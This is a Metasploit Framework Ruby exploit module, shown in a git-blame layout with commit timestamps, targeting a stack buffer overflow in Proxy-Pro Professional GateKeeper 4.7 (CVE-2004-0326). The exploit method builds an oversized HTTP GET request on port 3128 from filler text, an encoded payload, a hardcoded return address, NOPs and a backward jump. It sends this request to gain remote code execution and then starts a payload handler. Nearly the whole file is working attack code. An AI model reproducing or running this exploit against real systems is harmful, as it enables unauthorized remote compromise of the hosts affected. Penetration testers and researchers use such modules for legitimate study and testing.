2007-02-18 01:10:39 +01:00
|
|
|
##
|
2007-03-01 09:21:36 +01:00
|
|
|
# $Id$
|
2007-02-18 01:10:39 +01:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 10:40:19 +02:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 01:10:39 +01:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 16:33:26 +02:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 01:10:39 +01:00
|
|
|
##
|
|
|
|
|
2006-09-13 08:20:05 +02:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 07:23:59 +02:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 06:50:37 +01:00
|
|
|
Rank = GreatRanking
|
2006-09-13 08:20:05 +02:00
|
|
|
|
2008-10-02 07:23:59 +02:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2006-09-13 08:20:05 +02:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
|
|
|
|
'Description' => %q{
|
2010-05-09 19:45:00 +02:00
|
|
|
This module exploits a stack buffer overflow in Proxy-Pro Professional
|
2006-09-13 08:20:05 +02:00
|
|
|
GateKeeper 4.7. By sending a long HTTP GET to the default port
|
|
|
|
of 3128, a remote attacker could overflow a buffer and execute
|
|
|
|
arbitrary code.
|
|
|
|
},
|
|
|
|
'Author' => 'MC',
|
|
|
|
'License' => MSF_LICENSE,
|
2007-02-18 01:10:39 +01:00
|
|
|
'Version' => '$Revision$',
|
2010-04-30 10:40:19 +02:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2004-0326'],
|
2009-07-16 18:02:24 +02:00
|
|
|
['OSVDB', '4027'],
|
2006-09-13 08:20:05 +02:00
|
|
|
['BID', '9716'],
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 500,
|
|
|
|
'BadChars' => "\x00+&=%\x0a\x0d\x20",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'DisclosureDate' => 'Feb 23 2004',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
2010-04-30 10:40:19 +02:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(3128)
|
|
|
|
], self.class)
|
2006-09-13 08:20:05 +02:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
connect
|
|
|
|
|
|
|
|
print_status("Trying target #{target.name}...")
|
|
|
|
|
2010-04-30 10:40:19 +02:00
|
|
|
sploit = "GET /" + rand_text_english(3603, payload_badchars)
|
|
|
|
sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
|
|
|
|
sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"
|
2006-09-13 08:20:05 +02:00
|
|
|
|
|
|
|
sock.put(sploit)
|
|
|
|
sock.get_once(-1, 3)
|
2010-04-30 10:40:19 +02:00
|
|
|
|
2006-09-13 08:20:05 +02:00
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
2009-07-16 18:02:24 +02:00
|
|
|
end
|